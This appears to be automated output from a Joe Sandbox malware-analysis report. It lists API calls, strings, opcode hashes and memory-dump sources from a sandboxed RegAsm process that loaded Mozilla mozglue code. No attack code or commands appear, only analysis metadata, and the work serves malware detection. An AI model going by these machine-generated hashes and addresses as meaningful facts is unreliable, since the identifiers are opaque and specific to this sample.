                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileOperation
                                                                                      • String ID:
                                                                                      • API String ID: 3080627654-0
                                                                                      • Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                      • Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
                                                                                      • Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                      • Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: malloc
                                                                                      • String ID:
                                                                                      • API String ID: 2803490479-0
                                                                                      • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                      • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                      • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                      • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: malloc
                                                                                      • String ID:
                                                                                      • API String ID: 2803490479-0
                                                                                      • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                      • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                      • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                      • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55
                                                                                      APIs
                                                                                      • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0F6CCC
                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0F6D11
                                                                                      • moz_xmalloc.MOZGLUE(0000000C), ref: 6C0F6D26
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C0F6D35
                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0F6D53
                                                                                      • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C0F6D73
                                                                                      • free.MOZGLUE(00000000), ref: 6C0F6D80
                                                                                      • CertGetNameStringW.CRYPT32 ref: 6C0F6DC0
                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6C0F6DDC
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0F6DEB
                                                                                      • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C0F6DFF
                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C0F6E10
                                                                                      • CryptMsgClose.CRYPT32(00000000), ref: 6C0F6E27
                                                                                      • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C0F6E34
                                                                                      • CreateFileW.KERNEL32 ref: 6C0F6EF9
                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6C0F6F7D
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0F6F8C
                                                                                      • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C0F709D
                                                                                      • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0F7103
                                                                                      • free.MOZGLUE(00000000), ref: 6C0F7153
                                                                                      • CloseHandle.KERNEL32(?), ref: 6C0F7176
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F7209
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F723A
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F726B
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F729C
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F72DC
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F730D
                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0F73C2
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F73F3
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F73FF
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F7406
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F740D
                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0F741A
                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C0F755A
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0F7568
                                                                                      • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C0F7585
                                                                                      • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0F7598
                                                                                      • free.MOZGLUE(00000000), ref: 6C0F75AC
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                      • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                      • API String ID: 3256780453-3980470659
                                                                                      • Opcode ID: 344aa610265d245b6e48d483663c5f3071458421229a1b591068e6b49a1439f7
                                                                                      • Instruction ID: dca4026bd6f2d64f4a1ea35822dd9e494ad24717d966d319ec5c927603bddcea
                                                                                      • Opcode Fuzzy Hash: 344aa610265d245b6e48d483663c5f3071458421229a1b591068e6b49a1439f7
                                                                                      • Instruction Fuzzy Hash: A652A2B1A042149BEB21DF29CC84BAA77FCFF45708F104199E92997640DB70ABD5CF91
                                                                                      APIs
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C12F09B
                                                                                        • Part of subcall function 6C105B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C1056EE,?,00000001), ref: 6C105B85
                                                                                        • Part of subcall function 6C105B50: EnterCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105B90
                                                                                        • Part of subcall function 6C105B50: LeaveCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105BD8
                                                                                        • Part of subcall function 6C105B50: GetTickCount64.KERNEL32 ref: 6C105BE4
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C12F0AC
                                                                                        • Part of subcall function 6C105C50: GetTickCount64.KERNEL32 ref: 6C105D40
                                                                                        • Part of subcall function 6C105C50: EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C12F0BE
                                                                                        • Part of subcall function 6C105C50: __aulldiv.LIBCMT ref: 6C105DB4
                                                                                        • Part of subcall function 6C105C50: LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C105DED
                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C12F155
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F1E0
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F1ED
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F212
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F229
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F231
                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C12F248
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F2AE
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F2BB
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F2F8
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                        • Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                        • Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F350
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F35D
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F381
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F398
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F3A0
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F489
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F491
                                                                                        • Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
                                                                                        • Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508
                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C12F3CF
                                                                                        • Part of subcall function 6C12F070: GetCurrentThreadId.KERNEL32 ref: 6C12F440
                                                                                        • Part of subcall function 6C12F070: AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F44D
                                                                                        • Part of subcall function 6C12F070: ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F472
                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C12F4A8
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F559
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F561
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12F577
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F585
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F5A3
                                                                                      Strings
                                                                                      • [I %d/%d] profiler_resume, xrefs: 6C12F239
                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C12F56A
                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6C12F499
                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6C12F3A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                      • API String ID: 565197838-2840072211
                                                                                      • Opcode ID: 8b30c4f52d9b5592cb3cdd3db04334eccc786f03af5e2204b9efaee1b9f6388c
                                                                                      • Instruction ID: 3bb4a94162ee5da5e932a0f1e0eef5a13782d755de1eebda504d51461398528f
                                                                                      • Opcode Fuzzy Hash: 8b30c4f52d9b5592cb3cdd3db04334eccc786f03af5e2204b9efaee1b9f6388c
                                                                                      • Instruction Fuzzy Hash: 4CD13936704214CFDB00DF6AD4187BA77B8EB46368F10456AF97583F80DB789848D7A6
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C0F64DF
                                                                                      • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C0F64F2
                                                                                      • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C0F6505
                                                                                      • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C0F6518
                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0F652B
                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C0F671C
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C0F6724
                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C0F672F
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C0F6759
                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C0F6764
                                                                                      • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C0F6A80
                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C0F6ABE
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F6AD3
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F6AE8
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F6AF7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                      • API String ID: 487479824-2878602165
                                                                                      • Opcode ID: 9abdc5a175c5296b3fb71582daece633df441f44cf8a058a6f97c765361c9662
                                                                                      • Instruction ID: 072fb08237064f9f631d53ad2133c38b526d660e24ea80e654c07e2cd971bc8f
                                                                                      • Opcode Fuzzy Hash: 9abdc5a175c5296b3fb71582daece633df441f44cf8a058a6f97c765361c9662
                                                                                      • Instruction Fuzzy Hash: 4BF1B1709052199FDB20CF25CC48BAAB7F5EF46318F1442D9EC29A7641E731AAC6CF90
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,6C12E2A6), ref: 6C12E35E
                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6C12E2A6), ref: 6C12E386
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12E3E4
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E3F1
                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C12E4AB
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E4F5
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12E577
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E584
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12E5DE
                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C12E8A6
                                                                                        • Part of subcall function 6C0EB7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0EB7CF
                                                                                        • Part of subcall function 6C0EB7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0EB808
                                                                                        • Part of subcall function 6C13B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6C160FB6,00000000,?,?,6C12E69E), ref: 6C13B830
                                                                                      • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C12E6DA
                                                                                        • Part of subcall function 6C13B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6C13B916
                                                                                        • Part of subcall function 6C13B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6C13B94A
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C12E864
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C12E883
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                      • API String ID: 2698983630-53385798
                                                                                      • Opcode ID: 520d206790a3a29ac9d21e9076621633731af65e3a82cc1b94e74aa0bc4d4fb8
                                                                                      • Instruction ID: 8475530341d42cb772804f91a3db3706d2c36b8365629fbf59a78e691ba8f5b4
                                                                                      • Opcode Fuzzy Hash: 520d206790a3a29ac9d21e9076621633731af65e3a82cc1b94e74aa0bc4d4fb8
                                                                                      • Instruction Fuzzy Hash: 6B02AB79A043459FCB10CF29C484B6ABBF5FF89308F10452CE99A9BB41D734EA55CB91
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C10EE7A
                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C10EFB5
                                                                                      • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C111695
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C1116B4
                                                                                      • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C111770
                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C111A3E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$freemallocmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3693777188-0
                                                                                      • Opcode ID: 6c71aef5aef3f4a8702acd2b245217d88e665b5c691f8816d530c559592b7d86
                                                                                      • Instruction ID: 8eec4f1f044547564a3838ea01649b94362e515d91c2142aaf71b6f9cf979bf8
                                                                                      • Opcode Fuzzy Hash: 6c71aef5aef3f4a8702acd2b245217d88e665b5c691f8816d530c559592b7d86
                                                                                      • Instruction Fuzzy Hash: 0AB36971E04219CFCB14CFA8C890A9DF7B2BF49304F2582A9D559ABB45D734AD86CF90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpystrlen
                                                                                      • String ID: (pre-xul)$data$name$schema
                                                                                      • API String ID: 3412268980-999448898
                                                                                      • Opcode ID: 28f787358f7ba86182a89f0638d989b5fd06e022be06e4ce14cd578739f23dba
                                                                                      • Instruction ID: a0871de935f6ab0f810a3968899360cce1dcbb74086bfffbd7f719bec311c385
                                                                                      • Opcode Fuzzy Hash: 28f787358f7ba86182a89f0638d989b5fd06e022be06e4ce14cd578739f23dba
                                                                                      • Instruction Fuzzy Hash: 5FE17EB1A043408FC710CF69C84075BFBE9BB89318F55892DE8A5E7790DB74ED498B91
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D4F2
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D50B
                                                                                        • Part of subcall function 6C0ECFE0: EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0ECFF6
                                                                                        • Part of subcall function 6C0ECFE0: LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0ED026
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D52E
                                                                                      • EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C10D690
                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C10D6A6
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C10D712
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D751
                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C10D7EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
